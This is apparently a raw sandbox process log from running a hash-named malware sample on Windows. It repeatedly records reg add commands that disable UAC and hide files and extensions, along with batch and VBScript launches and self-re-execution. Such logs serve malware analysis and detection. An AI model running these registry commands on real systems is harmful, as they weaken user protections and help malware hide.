reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iysQkQEg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uoIwcUUQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cMEoQsUg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VAsowsUw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lQMwssAM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hsUYMAUY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZMwgQokc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yYscQMMw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MMYUUIkE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\auAIEEAQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ACsMUAwQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rWYoocYk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xYcwgggM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NKIMsAQg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGksUoMk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ogEQkIUo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uCEYAokM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zgsMAQgQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bgYQgswQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIcwYUQw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ceAIYkgQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ISIwYkoQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
